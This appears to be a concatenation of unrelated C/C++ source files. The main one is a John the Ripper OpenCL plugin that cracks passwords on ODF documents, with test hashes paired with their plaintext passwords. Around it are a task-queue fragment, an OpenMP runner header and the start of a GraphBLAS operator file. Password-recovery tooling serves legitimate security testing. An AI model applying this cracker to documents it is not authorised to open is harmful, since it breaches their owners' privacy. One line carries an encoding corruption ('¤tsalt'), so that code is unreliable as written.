*cur_pan = taskq->queue[taskq->head++];
--taskq->count;
#endif
--pxgstrf_shared->tasks_remain;
*bcol = *cur_pan;
}
#endif
/* @@@@@@@@@@@@@@ not called @@@@@@@@@@@@@@@@@@ */
|
opencl_odf_fmt_plug.c | /* Modified by Dhiru Kholia <dhiru at openwall.com> for ODF Blowfish format.
*
* This software is Copyright (c) 2012 Lukas Odzioba <ukasz@openwall.net>
* and it is hereby released to the general public under the following terms:
* Redistribution and use in source and binary forms, with or without
* modification, are permitted. */
#ifdef HAVE_OPENCL
#if FMT_EXTERNS_H
extern struct fmt_main fmt_opencl_odf;
#elif FMT_REGISTERS_H
john_register_one(&fmt_opencl_odf);
#else
#include <string.h>
#include "sha.h"
#include <openssl/blowfish.h>
#include "aes.h"
#ifdef _OPENMP
#include <omp.h>
#endif
#include "arch.h"
#include "formats.h"
#include "common.h"
#include "stdint.h"
#include "misc.h"
#include "options.h"
#include "common.h"
#include "formats.h"
#include "common-opencl.h"
#define FORMAT_LABEL "ODF-opencl"
#define FORMAT_NAME ""
#define ALGORITHM_NAME "SHA1 OpenCL Blowfish"
#define BENCHMARK_COMMENT ""
#define BENCHMARK_LENGTH -1
#define MIN_KEYS_PER_CRYPT 1
#define MAX_KEYS_PER_CRYPT 1
#define BINARY_SIZE 20
#define PLAINTEXT_LENGTH 64
#define SALT_SIZE sizeof(odf_cpu_salt)
#define BINARY_ALIGN MEM_ALIGN_WORD
#define SALT_ALIGN 4
typedef struct {
uint32_t length;
uint8_t v[20]; // hash of password
} odf_password;
typedef struct {
uint32_t v[32/4];
} odf_hash;
typedef struct {
uint32_t iterations;
uint32_t outlen;
uint32_t skip_bytes;
uint8_t length;
uint8_t salt[64];
} odf_salt;
static char (*saved_key)[PLAINTEXT_LENGTH + 1];
static ARCH_WORD_32 (*crypt_out)[32 / sizeof(ARCH_WORD_32)];
typedef struct {
int cipher_type;
int checksum_type;
int iterations;
int key_size;
int iv_length;
int salt_length;
int content_length;
unsigned char iv[16];
unsigned char salt[32];
unsigned char content[1024];
} odf_cpu_salt;
static odf_cpu_salt *cur_salt;
static struct fmt_tests odf_tests[] = {
{"$odf$*0*0*1024*16*df6c10f64d191a841812af53874b636d014ce3fe*8*07e28aff39d2660e*16*b124be9f3346fb77e0ebcc3bb80028f8*0*2276a1077f6a2a027bd565ce89824d6a20086e378876be05c4b8e3796a460e828c9803a692caf7a53492c220d1d7ecbf4e2d336c7abf5a7672acc804ca267318252cbc13676616d1fde38820f9fbeef1360067d9de096ba8c1032ae947bde1d0fedaf37b6020663d49faf36b7c095c5b9aae11c8fc2be74148f008edbdbb180b44028ad8259f1215b483542bf3027f56dee5f962448333b30f88e6ae4790b60d24abb286edff9adee831a4b3351fc47259043f0d683d7a25be7e47aff3aedca140005d866e218c8efcca32093c19bbece50bd96656d0f94a712d3c60d1e5342db86482fc73f05faf513ca0b137378126597b95986c372b412c953e97011259aab0839fe453c756559497a28ba88dce009e1e7980436131029d38e56a34f608e6471970d9959068808c898608024db9eb394c4feae7a364ea9272ec4ea2315a9f0407a4b27d5e49a8ab1e3ddce5c84927d5aecd7e68e4437a820ea8743c6b5b4e2abbb47b0001e2f77ceac4603e8774e4ccbc1adde794428c11ae4a7492727b620334302e63f72b0c06c1cf83800366916ee8295176819272d557863a831ee0a576841191482959aad69095831fa1d64e3e0e6f6c6a751bcdadf0fbaa27a17458709f708c04587cb208984c9525da6786e0e5aabefe30ad1dbbef66e85ce9d6dbe456fd85e4135de5cf16d9455976d7ca8de7b1b530661c74c0fae90c0fff1a2b5fcdfab19fcff75fadcec445ed8af6ab5babf1463e08458918be8045083de6db988c37e4be582cfac5cdf741d1f0322fb2902665c7ff347813348109e5d442e91fcb010c28f042da481e807084fcb4759b40ccf2cae77bad00cdfbfba4acf36aa1f74c30a315e3d7f1ca522b6306e8903352aafa51dc523d582d418934398d5eb88120e3656bfb640a239db507b285302a86855ea850ddc9af72fc62dc79336c9bc29ee8314c65adb0574e9c701d73d7fa977edd1d52a1ff2da5b8b94e1a0fdd01ffcc6583758f0a1f51750e45f12b58c6d38b140e5676cf3474224520ef7c52ca5e634f85456651f3d6f43d016ed7cc5da54ea640a3bc50c2b9d3dea8f93c0340d66ccd06efc5ae002108c33cf3a470c4a50f6a6ca2f11b8ad15511688c282b94ba6f1c332e239d10946dc46f763f08d12cb9edc1e79c0e07f7151f548e6d7d20ec13b52d911bf980cac60694e192651403c9a69abea045190e847be093fc9ba43fec55b32f77f5796ddca25b441f259d5c51e06df6c6588c6414899481ba9e06bcebec58f82ff3021b09c6beae13a5d22bc94870f72ab813d0c0be01d91f3d075192e7a5de765599d72244757d09539529a8347e077a36678166e5ed9f73a5aad2e147d8154095c397e3e5e4ba1987ca64c1301a0c6c3e438097ede9b701a105ec38fcb54abb31b367c7740cd9ac459e561094a34f01acee555e60267157e6", "test"},
{"$odf$*0*0*1024*16*43d3dbd907785c4fa5282a2e73a5914db3372505*8*b3d676d4519e6b5a*16*34e3f7fdfa67fb0078360b0df4011270*0*7eff7a7abf1e6b0c4a9fafe6bdcfcfeaa5b1886592a52bd255f1b51096973d6fa50d792c695f3ef82c6232ae7f89c771e27db658258ad029e82415962b270d2c859b0a3efb231a0519ec1c807082638a9fad7537dec22e20d59f2bfadfa84dd941d59dd07678f9e60ffcc1eb27d8a2ae47b616618e5e80e27309cd027724355bf78b03d5432499c1d2a91d9c67155b7f49e61bd8405e75420d0cfb9e64b238623a9d8ceb47a3fdb5e7495439bb96e79882b850a0c8d3c0fbef5e6d425ae359172b9a82ec0566c3578a9f07b86a70d75b5ad339569c1c8f588143948d63bdf88d6ed2e751ac07f25ecc5778dc06247e5a9edca869ee3335e5dae351666a618d00ec05a35bc73d330bef12a46fb53b2ff96e1b2919af4e692730b9c9664aca761df10d6cf55396c4d4c268e6e96c96515c527c8fe2716ac7a9f016941aa46e6b03e8a5069c29ec8e8614b7da3e2e154a77510393051a0b693ae40da6afb5712a4ce4ac0ebacda1f45bdccc8a7b21e153d1471665cae3205fbfa00129bf00c06777bfecba2c43a1481a00111b4f0bd30c2378bd1e2e219700406411c6f897a3dfa51b31613cb241d56b68f3c241428783b353be26fa8b2df68ca215d1cf892c10fdef94faf2381a13f8cb2bce1a7dbb7522ef0b2a83e5a96ca66417fd2928784054e80d74515c1582ad356dd865837b5ea90674a30286a72a715f621c9226f19a321b413543fbbdb7cd9d1f99668b19951304e7267554d87992fbf9a96116601d0cee9e23cb22ba474c3f721434400cacf15bae05bbe9fa17f69967d03689c48a26fa57ff9676c96767762f2661b6c8f8afa4f96f989086aa02b6f8d039c6f4d158cc33a56cbf77640fb5087b2d5a5251692bb9255d0ae8148c7157c40031fdb0ea90d5fab546a7e1e1c15bd6a27f3716776c8a3fdbdd4f34c19fef22c36117c124876606b1395bf96266d647aaf5208eefd729a42a4efe42367475315a979fb74dcb9cd30917a811ed8283f2b111bb5a5d2b0f5589b3652f17d23e352e1494f231027bb93209e3c6a0388f8b2214577dca8aa9d705758aa334d6947491488770ed8066f692f8922ff0d852c2d0f965ab3d8a13c6de0ef3cff5a15ee7b64f9b1003817f0cb919ad021d5f3b0b5c1ad58db22e8fbd63abfb40e61065bad008cdffbbe3c563780a548f4515df5c935d9aa2a3033bc8a4011c9c173a0366c9b7b07f2a27de0e55373fb4b0c7726997be6f410a2ee5980393ea005516e89538be796131e450403420d72cdbd75475fd11c50efce5eb340d55d2dd0a67ca45ddb53aa582a2ec56b46452e26a505bf730998513837c96a121e4ad13af5030392ff7fb660955e03f65894733862f2367d529f0e8cdb73272b9ce01491747cb3e1a22f5c85ab6d40ddd35d15b9d46d73600e0971da90f93cb0e9be357c4f1227fbf5b123e5b", "jumper9"},
{"$odf$*0*0*1024*16*4ec0370ab589f943131240e407a35b58a341e052*8*19cadc01889f78c0*16*dcfcb8baccda277764e4e99833ab9640*0*a7bd859d68298fbdc36b6b51eb06f7055befe08f76ca9833c6e298db8ed971bfd1315065a19e1b31b8a93624757a2583816f35d6f251ff7943be626b3dc72f0b320c9ce5d80b7cc676aa02e6a4996abd752da573ecc339d2c80a2c8bfc28a9f4ceea51c2969adf20c8762b2ee0b1835bbd31bd90d5a638cfe523a596ea95feca64ae20010ad9957a724143e25a875f3cec3cedb4df1c16ac82b46b35db269da98270c813acd5e55a2c138306decdf96b1c1079d9cfd3704d519fbc5a4a547ba5286a7e80dc434f1bf34260433cbb79c4bcbb2a5bfc5a6c2430944ef2e34e7b9c76b21a97003c1fa85f6e9c4ed984108a7d301afe4a8f6625502a4bf17b24e009717c711571da2d6acd25868892bb9e29a77da8018222cd57c91d9aad96c954355e50a4760f08aa1f1b4257f7eb1a235c9234e8fc4ed97e8ad3e5d7d128807b726a4eb0038246d8580397c0ff5873d34b5a688a4a931be7c5737e5ada3e830b02d3efb075e338d71be55751a765a21d560933812856986a4d0d0a6d4954c50631fa3dff8565057149c4c4951858be4d5dca8e492093cfd88b56a19a161e7595e2e98764e91eb51c5289dc4efa65c7b207c517e269e3c699373fe1bf177c5d641cf2cfa4bd2afe8bff53a98b2d64bedc5a2e2f2973416c66791cf012696a0e95f7a4dadb86f925fc1943cb2b75fb3eda30f7779edff7cce95ae6f0f7b45ac207a4de4ec012a3654103136e11eb496276647d5e8f6e1659951fc7ef78d60e9430027e826f2aaab7c93ef58a5af47b92cec2f17903a26e2cc5d8d09b1db55e568bfb23a6b6b46125daf71a2f3a708676101d1b657cd38e81deb74d5d877b3321349cd667c29359b45b82218ad96f6c805ac3439fc63f0c91d66da36bae3f176c23b45b8ca1945fb4a4cea5c4a7b0f6ffd547614e7016f94d3e7889ccac868578ea779cd7e6b015aafd296dd5e2da2aa7e2f2af2ce6605f53613f069194dff35ffb9a2ebb30e011c26f669ededa2c91ffb06fedc44cf23f35d7d2716abcd50a8f561721d613d8f2c689ac245a5ac084fa86c72bbe80da7d508e63d891db528fa9e8f0d608034cd97dfde70f739857672e2d70070e850c3a6521067c1774244b86cca835ca8ff1748516e694ea2b5b42555f0df9cb9ec78825c351df51a76b6fe23b58ab3e87ba94ffbb98c9fa9d50c0c282ed0e506bcad24c02d8b625b4bdac822a9e5c911d095c5e4d3bf03448add978e0e7fab7f8a7008568f01a4f06f155223086bdcfe6879e76f199afb9caeadebaa9ec4ec8120f4ccfc4f5f7d7e3cc4dd0cba4d11546d8540030769c4b6d54abdd51fa1f30da642e5ff5c35d3e711c8931ff79e9f256ac6416e99943b0000bf32a5efdd5cf1cd668a62381febe959ca472be9c1a9bade59dbba07eb035ddb1e64ae2923bd276deed788db7600d776f49339215", "RickRoll"},
{"$odf$*0*0*1024*16*399a33262bbef99543bae29a6bb069c36e3a8f1b*8*6b721193b04fa933*16*99a6342ca7221c81890035dc5033c16f*0*ef8692296b67a8a77344e87b6193dc0a370b115d9e8c85e901c1a19d03ee2a34b7bf989bf9c2edab61022ea49f2a3ce5a6c807af374afd21b52ccbd0aa13784c73d2c8feda1fe0c8ebbb94e46e32904d95d1f135759e2733c2bd30b8cb0050c1cb8a2336c1151c498b9609547e96243aed9473e0901b55137ed78e2c6057e5826cfbfb94b0d77cb12b1fb6ac2752ea71c9c05cdb6a2f3d9611cb24f6e23065b408601518e3182ba1b8cef4cfcdf6ceecb2f33267cf733d3da715562e6977015b2b6423fb416781a1b6a67252eec46cda2741163f86273a68cd241a06263fdd8fc25f1c30fd4655724cc3e5c3d8f3e84abf446dd545155e440991c5fa613b7c18bd0dabd1ad45beb508cfb2b08d4337179cba63df5095b3d640eadbd72ca07f5c908241caf384ca268355c0d13471c241ea5569a5d04a9e3505883eb1c359099c1578e4bc33a73ba74ceb4a0520e0712e3c88582549a668a9c11b8680368cfbc3c5ec02663ddd97963d9dacefed89912ffa9cd945a8634a653296163bb873f3afd1d02449494fab168e7f652230c16d35853df1164219c04c4bd17954b85eb1939d87412eeeb2a039a8bb087178c03a9a40165a28a985e8bc443071b3764d846d342ca2073223f9809fe2ee3a1dfa65b9d897877ebb33a48a760c8fb32062b51a96421256a94896e93b41f559fdec7743680a8deacff9132d6129574d1a62be94308b195d06a275947a1455600030468dde53639fd239a8ab074ec1c7f661f2c9e8d60d6e0e743d351017d5c3d3be21b67d05310d0c5f3fd670acd95ca24f91b0d84d761d15259848f736ff08610e300c31b242f6d24ac2418cdd1fe0248f8a2a2f5775c08e5571c8d25d65ff573cc403ea9cad3bafd56c166fbcec9e64909df3c6ec8095088a8992493b7180c4dbb4053dcb55d9c5f46d728a97ae4ec7ac4b5941bcc3b64a4af31f7dc673e6715a52c9cdbe23dc21e51784f8314c019fc90e8612fcffe01d026fd9e15d1474e73dedf1d3830da81320097be6953173e4293372b5e5a8ecc49ac8b1a658cff16ffa04a8c1728d02ab67694170f10bc9030939ff6df3f901faa019d9b9fd2ba23e89eb0bbaf7a69a2272ee1df0403e6435aee147da217e8bf4c1ee5c53eb83aac1b3f8772d5cd2a2686f312ac4f4f2b0733593e28305a550dbbd18d3405a464ff20e0d9364cfe49b82a97ef7303aec92004a3476cf9ad012eaaf10fd07d3823e1b6871e82113ecfe4392854de9ab21ab1e33ce93d1abb07018007f50d641c8eb85b28fd335fd2281745772c98f8f0bba3f4d40ba602545ef8a0db3062f02d7ee5f49b42cbe19c0c2124952f98c49aff6927110314e54fe8d47a10f13d2d4055c1f3f2d679d4043c9b2f68b2220b6c6c738f6402c01d000c9394c8ed27e70c7ee6108d3e7e809777bab9be30b33a3fb83271cbf3b", "WhoCanItBeNow"},
{NULL}
};
static cl_int cl_error;
static odf_password *inbuffer;
static odf_hash *outbuffer;
static odf_salt currentsalt;
static cl_mem mem_in, mem_out, mem_setting;
static struct fmt_main *self;
size_t insize, outsize, settingsize, cracked_size;
#define STEP 0
#define SEED 256
// This file contains auto-tuning routine(s). Has to be included after formats definitions.
#include "opencl-autotune.h"
#include "memdbg.h"
static const char * warn[] = {
"xfer: ", ", crypt: ", ", xfer: "
};
/* ------- Helper functions ------- */
static size_t get_task_max_work_group_size()
{
return autotune_get_task_max_work_group_size(FALSE, 0, crypt_kernel);
}
static void create_clobj(size_t gws, struct fmt_main *self)
{
insize = sizeof(odf_password) * gws;
outsize = sizeof(odf_hash) * gws;
settingsize = sizeof(odf_salt);
cracked_size = sizeof(*crypt_out) * gws;
inbuffer = mem_calloc(1, insize);
outbuffer = mem_alloc(outsize);
saved_key = mem_calloc(gws, sizeof(*saved_key));
crypt_out = mem_calloc(1, cracked_size);
/// Allocate memory
mem_in =
clCreateBuffer(context[gpu_id], CL_MEM_READ_ONLY, insize, NULL,
&cl_error);
HANDLE_CLERROR(cl_error, "Error allocating mem in");
mem_setting =
clCreateBuffer(context[gpu_id], CL_MEM_READ_ONLY, settingsize,
NULL, &cl_error);
HANDLE_CLERROR(cl_error, "Error allocating mem setting");
mem_out =
clCreateBuffer(context[gpu_id], CL_MEM_WRITE_ONLY, outsize, NULL,
&cl_error);
HANDLE_CLERROR(cl_error, "Error allocating mem out");
HANDLE_CLERROR(clSetKernelArg(crypt_kernel, 0, sizeof(mem_in),
&mem_in), "Error while setting mem_in kernel argument");
HANDLE_CLERROR(clSetKernelArg(crypt_kernel, 1, sizeof(mem_out),
&mem_out), "Error while setting mem_out kernel argument");
HANDLE_CLERROR(clSetKernelArg(crypt_kernel, 2, sizeof(mem_setting),
&mem_setting), "Error while setting mem_salt kernel argument");
}
static void release_clobj(void)
{
if (crypt_out) {
HANDLE_CLERROR(clReleaseMemObject(mem_in), "Release mem in");
HANDLE_CLERROR(clReleaseMemObject(mem_setting), "Release mem setting");
HANDLE_CLERROR(clReleaseMemObject(mem_out), "Release mem out");
MEM_FREE(inbuffer);
MEM_FREE(outbuffer);
MEM_FREE(saved_key);
MEM_FREE(crypt_out);
}
}
static void done(void)
{
if (autotuned) {
release_clobj();
HANDLE_CLERROR(clReleaseKernel(crypt_kernel), "Release kernel");
HANDLE_CLERROR(clReleaseProgram(program[gpu_id]), "Release Program");
autotuned--;
}
}
static void init(struct fmt_main *_self)
{
self = _self;
opencl_prepare_dev(gpu_id);
}
static void reset(struct db_main *db)
{
if (!autotuned) {
char build_opts[64];
snprintf(build_opts, sizeof(build_opts),
"-DKEYLEN=%d -DSALTLEN=%d -DOUTLEN=%d",
(int)sizeof(inbuffer->v),
(int)sizeof(currentsalt.salt),
(int)sizeof(outbuffer->v));
opencl_init("$JOHN/kernels/pbkdf2_hmac_sha1_unsplit_kernel.cl",
gpu_id, build_opts);
crypt_kernel = clCreateKernel(program[gpu_id], "derive_key", &cl_error);
HANDLE_CLERROR(cl_error, "Error creating kernel");
// Initialize openCL tuning (library) for this format.
opencl_init_auto_setup(SEED, 0, NULL, warn, 1,
self, create_clobj, release_clobj,
sizeof(odf_password), 0, db);
// Auto tune execution from shared/included code.
autotune_run(self, 1, 0, 1000);
}
}
static int valid(char *ciphertext, struct fmt_main *self)
{
char *ctcopy;
char *keeptr;
char *p;
int res;
if (strncmp(ciphertext, "$odf$*", 6))
return 0;
/* handle 'chopped' .pot lines */
if (ldr_isa_pot_source(ciphertext))
return 1;
ctcopy = strdup(ciphertext);
keeptr = ctcopy;
ctcopy += 6;
if ((p = strtokm(ctcopy, "*")) == NULL) /* cipher type */
goto err;
res = atoi(p);
if (res != 0) {
goto err;
}
if ((p = strtokm(NULL, "*")) == NULL) /* checksum type */
goto err;
res = atoi(p);
if (res != 0 && res != 1)
goto err;
if ((p = strtokm(NULL, "*")) == NULL) /* iterations */
goto err;
if ((p = strtokm(NULL, "*")) == NULL) /* key size */
goto err;
res = atoi(p);
if (res != 16 && res != 32)
goto err;
if ((p = strtokm(NULL, "*")) == NULL) /* checksum field (skipped) */
goto err;
//if (hexlenl(p) != res) // Hmm. res==16, length of p == 40??? Not sure about this one.
// goto err;
if (!ishexlc(p))
goto err;
if ((p = strtokm(NULL, "*")) == NULL) /* iv length */
goto err;
res = atoi(p);
if (res > 16)
goto err;
if ((p = strtokm(NULL, "*")) == NULL) /* iv */
goto err;
if (hexlenl(p) != res * 2)
goto err;
if ((p = strtokm(NULL, "*")) == NULL) /* salt length */
goto err;
res = atoi(p);
if (res > 32)
goto err;
if ((p = strtokm(NULL, "*")) == NULL) /* salt */
goto err;
if (hexlenl(p) != res * 2)
goto err;
if ((p = strtokm(NULL, "*")) == NULL) /* something */
goto err;
if ((p = strtokm(NULL, "*")) == NULL) /* content */
goto err;
res = strlen(p);
if (res > 2048 || res & 1)
goto err;
if (!ishexlc(p))
goto err;
MEM_FREE(keeptr);
return 1;
err:
MEM_FREE(keeptr);
return 0;
}
static void *get_salt(char *ciphertext)
{
char *ctcopy = strdup(ciphertext);
char *keeptr = ctcopy;
int i;
char *p;
static odf_cpu_salt cs;
ctcopy += 6; /* skip over "$odf$*" */
p = strtokm(ctcopy, "*");
cs.cipher_type = atoi(p);
p = strtokm(NULL, "*");
cs.checksum_type = atoi(p);
p = strtokm(NULL, "*");
cs.iterations = atoi(p);
p = strtokm(NULL, "*");
cs.key_size = atoi(p);
p = strtokm(NULL, "*");
/* skip checksum field */
p = strtokm(NULL, "*");
cs.iv_length = atoi(p);
p = strtokm(NULL, "*");
for (i = 0; i < cs.iv_length; i++)
cs.iv[i] = atoi16[ARCH_INDEX(p[i * 2])] * 16
+ atoi16[ARCH_INDEX(p[i * 2 + 1])];
p = strtokm(NULL, "*");
cs.salt_length = atoi(p);
p = strtokm(NULL, "*");
for (i = 0; i < cs.salt_length; i++)
cs.salt[i] = atoi16[ARCH_INDEX(p[i * 2])] * 16
+ atoi16[ARCH_INDEX(p[i * 2 + 1])];
p = strtokm(NULL, "*");
p = strtokm(NULL, "*");
memset(cs.content, 0, sizeof(cs.content));
for (i = 0; p[i * 2] && i < 1024; i++)
cs.content[i] = atoi16[ARCH_INDEX(p[i * 2])] * 16
+ atoi16[ARCH_INDEX(p[i * 2 + 1])];
cs.content_length = i;
MEM_FREE(keeptr);
return (void *)&cs;
}
static void *get_binary(char *ciphertext)
{
static union {
unsigned char c[BINARY_SIZE+1];
ARCH_WORD dummy;
} buf;
unsigned char *out = buf.c;
char *p;
int i;
char *ctcopy = strdup(ciphertext);
char *keeptr = ctcopy;
ctcopy += 6; /* skip over "$odf$*" */
strtokm(ctcopy, "*");
strtokm(NULL, "*");
strtokm(NULL, "*");
strtokm(NULL, "*");
p = strtokm(NULL, "*");
for (i = 0; i < BINARY_SIZE; i++) {
out[i] =
(atoi16[ARCH_INDEX(*p)] << 4) |
atoi16[ARCH_INDEX(p[1])];
p += 2;
}
MEM_FREE(keeptr);
return out;
}
static void set_salt(void *salt)
{
cur_salt = (odf_cpu_salt*)salt;
memcpy((char*)currentsalt.salt, cur_salt->salt, cur_salt->salt_length);
currentsalt.length = cur_salt->salt_length;
currentsalt.iterations = cur_salt->iterations;
currentsalt.outlen = cur_salt->key_size;
currentsalt.skip_bytes = 0;
HANDLE_CLERROR(clEnqueueWriteBuffer(queue[gpu_id], mem_setting,
CL_FALSE, 0, settingsize, ¤tsalt, 0, NULL, NULL),
"Copy salt to gpu");
}
static int get_hash_0(int index) { return crypt_out[index][0] & PH_MASK_0; }
static int get_hash_1(int index) { return crypt_out[index][0] & PH_MASK_1; }
static int get_hash_2(int index) { return crypt_out[index][0] & PH_MASK_2; }
static int get_hash_3(int index) { return crypt_out[index][0] & PH_MASK_3; }
static int get_hash_4(int index) { return crypt_out[index][0] & PH_MASK_4; }
static int get_hash_5(int index) { return crypt_out[index][0] & PH_MASK_5; }
static int get_hash_6(int index) { return crypt_out[index][0] & PH_MASK_6; }
#undef set_key
static void set_key(char *key, int index)
{
int saved_len = strlen(key);
if (saved_len > PLAINTEXT_LENGTH)
saved_len = PLAINTEXT_LENGTH;
memcpy(saved_key[index], key, saved_len);
saved_key[index][saved_len] = 0;
}
static char *get_key(int index)
{
return saved_key[index];
}
static int crypt_all(int *pcount, struct db_salt *salt)
{
const int count = *pcount;
int index;
size_t *lws = local_work_size ? &local_work_size : NULL;
global_work_size = GET_MULTIPLE_OR_BIGGER(count, local_work_size);
#ifdef _OPENMP
#pragma omp parallel for
#endif
for(index = 0; index < count; index++)
{
unsigned char hash[20];
SHA_CTX ctx;
SHA1_Init(&ctx);
SHA1_Update(&ctx, (unsigned char *)saved_key[index], strlen(saved_key[index]));
SHA1_Final((unsigned char *)hash, &ctx);
memcpy(inbuffer[index].v, hash, 20);
inbuffer[index].length = 20;
}
/// Copy data to gpu
BENCH_CLERROR(clEnqueueWriteBuffer(queue[gpu_id], mem_in, CL_FALSE, 0,
insize, inbuffer, 0, NULL, multi_profilingEvent[0]),
"Copy data to gpu");
/// Run kernel
BENCH_CLERROR(clEnqueueNDRangeKernel(queue[gpu_id], crypt_kernel, 1,
NULL, &global_work_size, lws, 0, NULL,
multi_profilingEvent[1]), "Run kernel");
/// Read the result back
BENCH_CLERROR(clEnqueueReadBuffer(queue[gpu_id], mem_out, CL_TRUE, 0,
outsize, outbuffer, 0, NULL, multi_profilingEvent[2]), "Copy result back");
if (ocl_autotune_running)
return count;
#ifdef _OPENMP
#pragma omp parallel for
#endif
for(index = 0; index < count; index++)
{
BF_KEY bf_key;
SHA_CTX ctx;
int bf_ivec_pos;
unsigned char ivec[8];
unsigned char output[1024];
bf_ivec_pos = 0;
memcpy(ivec, cur_salt->iv, 8);
BF_set_key(&bf_key, cur_salt->key_size, (unsigned char*)outbuffer[index].v);
BF_cfb64_encrypt(cur_salt->content, output, cur_salt->content_length, &bf_key, ivec, &bf_ivec_pos, 0);
SHA1_Init(&ctx);
SHA1_Update(&ctx, output, cur_salt->content_length);
SHA1_Final((unsigned char*)crypt_out[index], &ctx);
}
return count;
}
static int cmp_all(void *binary, int count)
{
int index = 0;
for (; index < count; index++)
if (!memcmp(binary, crypt_out[index], ARCH_SIZE))
return 1;
return 0;
}
static int cmp_one(void *binary, int index)
{
return !memcmp(binary, crypt_out[index], BINARY_SIZE);
}
static int cmp_exact(char *source, int index)
{
return 1;
}
struct fmt_main fmt_opencl_odf = {
{
FORMAT_LABEL,
FORMAT_NAME,
ALGORITHM_NAME,
BENCHMARK_COMMENT,
BENCHMARK_LENGTH,
0,
PLAINTEXT_LENGTH,
BINARY_SIZE,
BINARY_ALIGN,
SALT_SIZE,
SALT_ALIGN,
MIN_KEYS_PER_CRYPT,
MAX_KEYS_PER_CRYPT,
FMT_CASE | FMT_8_BIT | FMT_OMP,
{ NULL },
odf_tests
}, {
init,
done,
reset,
fmt_default_prepare,
valid,
fmt_default_split,
get_binary,
get_salt,
{ NULL },
fmt_default_source,
{
fmt_default_binary_hash_0,
fmt_default_binary_hash_1,
fmt_default_binary_hash_2,
fmt_default_binary_hash_3,
fmt_default_binary_hash_4,
fmt_default_binary_hash_5,
fmt_default_binary_hash_6
},
fmt_default_salt_hash,
NULL,
set_salt,
set_key,
get_key,
fmt_default_clear_keys,
crypt_all,
{
get_hash_0,
get_hash_1,
get_hash_2,
get_hash_3,
get_hash_4,
get_hash_5,
get_hash_6
},
cmp_all,
cmp_one,
cmp_exact
}
};
#endif /* plugin stanza */
#endif /* HAVE_OPENCL */
|
runner_openmp.h | //#include <omp.h>
/*
template<typename ...Args>
void Runner<Args...>::run_openmp()
{
//TODO enable openmp
#pragma omp parallel for
for(int i =0; i < N;++i)
{
global_id = i;
run_cpu();
}
}
*/
void run_openmp()
{
#pragma omp parallel for
for(int i =0; i < N;++i)
{
//global_id = i;
global_ids[omp_get_thread_num()] = i;
run_cpu();
}
}
void run_hybrid() {
int scale = hybrid_scale;
int downscale = 100;
auto clrunner = Runner(*this);
debug_printf("post copy");
clrunner.N = std::min(N,multiple_of_local((N*scale+downscale-1)/downscale));
debug_printf("clrunner.N = %i", clrunner.N);
int leftover = N-clrunner.N;
for( int i = 0 ; i < sizeof...(Args);++i)
{
if(read_mem[i]) {
if(clrunner.sizes[i] == N) {
clrunner.sizes[i] = std::min(clrunner.sizes[i],clrunner.N);
}
else {
throw std::runtime_error("wrong read mem size for hybrid");
}
}
}
clrunner.load_opencl();
#pragma omp parallel for
for(int i =0; i < leftover+1;++i)
{
global_ids[omp_get_thread_num()] = clrunner.N-1+i;
if(i==0){
//clrunner.wait_opencl();
//clrunner.run_opencl();
}
else {
run_cpu();
}
}
clrunner.wait_opencl();
} |
GB_binop__second_int8.c | //------------------------------------------------------------------------------
// GB_binop: hard-coded functions for each built-in binary operator
//------------------------------------------------------------------------------
// SuiteSparse:GraphBLAS, Timothy A. Davis, (c) 2017-2021, All Rights Reserved.
// SPDX-License-Identifier: Apache-2.0
//------------------------------------------------------------------------------
// If this file is in the Generated2/ folder, do not edit it
// (it is auto-generated from Generator/*).
#include "GB.h"
#ifndef GBCOMPACT
#include "GB_emult.h"
#include "GB_control.h"
#include "GB_ek_slice.h"
#include "GB_dense.h"
#include "GB_atomics.h"
#include "GB_bitmap_assign_methods.h"
#include "GB_binop__include.h"
// C=binop(A,B) is defined by the following types and operators:
// A+B function (eWiseAdd): GB (_AaddB__second_int8)
// A.*B function (eWiseMult): GB (_AemultB_01__second_int8)
// A.*B function (eWiseMult): GB (_AemultB_02__second_int8)
// A.*B function (eWiseMult): GB (_AemultB_03__second_int8)
// A.*B function (eWiseMult): GB (_AemultB_bitmap__second_int8)
// A*D function (colscale): GB (_AxD__second_int8)
// D*A function (rowscale): GB (_DxB__second_int8)
// C+=B function (dense accum): GB (_Cdense_accumB__second_int8)
// C+=b function (dense accum): GB (_Cdense_accumb__second_int8)
// C+=A+B function (dense ewise3): GB ((none))
// C=A+B function (dense ewise3): GB (_Cdense_ewise3_noaccum__second_int8)
// C=scalar+B GB ((none))
// C=scalar+B' GB ((none))
// C=A+scalar GB ((none))
// C=A'+scalar GB ((none))
// C type: int8_t
// A type: int8_t
// B,b type: int8_t
// BinaryOp: cij = bij
#define GB_ATYPE \
int8_t
#define GB_BTYPE \
int8_t
#define GB_CTYPE \
int8_t
// true if the types of A and B are identical
#define GB_ATYPE_IS_BTYPE \
1
// true if the types of C and A are identical
#define GB_CTYPE_IS_ATYPE \
1
// true if the types of C and B are identical
#define GB_CTYPE_IS_BTYPE \
1
// aij = Ax [pA]
#define GB_GETA(aij,Ax,pA,A_iso) \
;
// bij = Bx [pB]
#define GB_GETB(bij,Bx,pB,B_iso) \
int8_t bij = GBX (Bx, pB, B_iso)
// declare scalar of the same type as C
#define GB_CTYPE_SCALAR(t) \
int8_t t
// cij = Ax [pA]
#define GB_COPY_A_TO_C(cij,Ax,pA,A_iso) \
cij = GBX (Ax, pA, A_iso)
// cij = Bx [pB]
#define GB_COPY_B_TO_C(cij,Bx,pB,B_iso) \
cij = GBX (Bx, pB, B_iso)
#define GB_CX(p) Cx [p]
// binary operator
#define GB_BINOP(z,x,y,i,j) \
z = y ;
// true if the binop must be flipped
#define GB_BINOP_FLIP \
0
// op is second
#define GB_OP_IS_SECOND \
1
// do the numerical phases of GB_add and GB_emult
#define GB_PHASE_2_OF_2
// hard-coded loops can be vectorized
#define GB_PRAGMA_SIMD_VECTORIZE GB_PRAGMA_SIMD
// disable this operator and use the generic case if these conditions hold
#define GB_DISABLE \
(GxB_NO_SECOND || GxB_NO_INT8 || GxB_NO_SECOND_INT8)
//------------------------------------------------------------------------------
// C += A+B, all 3 matrices dense
//------------------------------------------------------------------------------
#if 0
// The op must be MIN, MAX, PLUS, MINUS, RMINUS, TIMES, DIV, or RDIV.
void GB ((none))
(
GrB_Matrix C,
const GrB_Matrix A,
const GrB_Matrix B,
const int nthreads
)
{
#include "GB_dense_ewise3_accum_template.c"
}
#endif
//------------------------------------------------------------------------------
// C = A+B, all 3 matrices dense
//------------------------------------------------------------------------------
GrB_Info GB (_Cdense_ewise3_noaccum__second_int8)
(
GrB_Matrix C,
const GrB_Matrix A,
const GrB_Matrix B,
const int nthreads
)
{
#if GB_DISABLE
